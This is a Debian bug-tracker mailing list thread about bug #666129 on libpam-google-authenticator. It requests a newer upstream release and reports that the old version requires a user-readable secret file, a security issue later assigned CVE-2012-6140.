Bug#666129: Please update to a newer upstream release
tag 666129 security severity 666129 critical retitle 666129 new upstream version fixes security problem with the secret file thanks On Sat, 22 Sep 2012, rk wrote: There is also a severe and somewhat undocumented security issue fixed by the user= parameter added in this commit: https://code.google.com/p/google-authenticator/source/detail?r=c3414e9857ad64e52283f3266065ef3023fc69a8 Without this option, the SECRET file is required to be user-readable which can expose the secret to an attacker under certain configurations (notably when required for `sudo`, but not system login). This is indeed a security problem. Lenart, do you need any help to get the package updated? I also think it doesn't make sense to ship the package in this state with wheezy and there I asked for removal from testing. Alex -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#666129: Please update to a newer upstream release
Control: retitle 666129 new upstream version fixes security problem with the secret file (CVE-2012-6140) Hi all On Thu, Apr 18, 2013 at 09:13:24AM +0200, Alexander Wirt wrote: tag 666129 security severity 666129 critical retitle 666129 new upstream version fixes security problem with the secret file thanks On Sat, 22 Sep 2012, rk wrote: There is also a severe and somewhat undocumented security issue fixed by the user= parameter added in this commit: https://code.google.com/p/google-authenticator/source/detail?r=c3414e9857ad64e52283f3266065ef3023fc69a8 Without this option, the SECRET file is required to be user-readable which can expose the secret to an attacker under certain configurations (notably when required for `sudo`, but not system login). This is indeed a security problem. Lenart, do you need any help to get the package updated? I also think it doesn't make sense to ship the package in this state with wheezy and there I asked for removal from testing. A CVE was assigned for this issue: CVE-2012-6140, see[1]. [1]: http://marc.info/?l=oss-securitym=136630281802738w=2 Regards, Salvatore -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#666129: Please update to a newer upstream release
Package: libpam-google-authenticator Version: 20110413.68230188bdc7-1.1 Followup-For: Bug #666129 Upstream released version 1.0 in May by the way: http://code.google.com/p/google-authenticator/downloads/detail?name=libpam-google-authenticator-1.0-source.tar.bz2 cheers, Phil -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#666129: Please update to a newer upstream release
There is also a severe and somewhat undocumented security issue fixed by the user= parameter added in this commit: https://code.google.com/p/google-authenticator/source/detail?r=c3414e9857ad64e52283f3266065ef3023fc69a8 Without this option, the SECRET file is required to be user-readable which can expose the secret to an attacker under certain configurations (notably when required for `sudo`, but not system login). -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#666129: Please update to a newer upstream release
Package: libpam-google-authenticator Version: 20110413.68230188bdc7-1.1 Severity: wishlist Hi, I would like to have a newer version of google-authenticator in the archive; the version currently in Debian is almost a year old and several new features have been added to upstream's trunk (it's unfortunate that upstream doesn't believe in releases…). In particular, I was interested in having counter-based HOTP instead of TOTP, since the box I want to use libpam-google-authenticator in doesn't have an RTC and relying into not having network outages (for NTP) is a no-go for this. I was happy to see that upstream supports this, only to be disappointed that this isn't in Debian :-) If you're busy, I can certainly help with the upload and do an NMU, although I'm afraid I don't have the time or will to help with the maintenance in general. Thanks, and thank you for packaging google-authenticator. Regards, Faidon -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
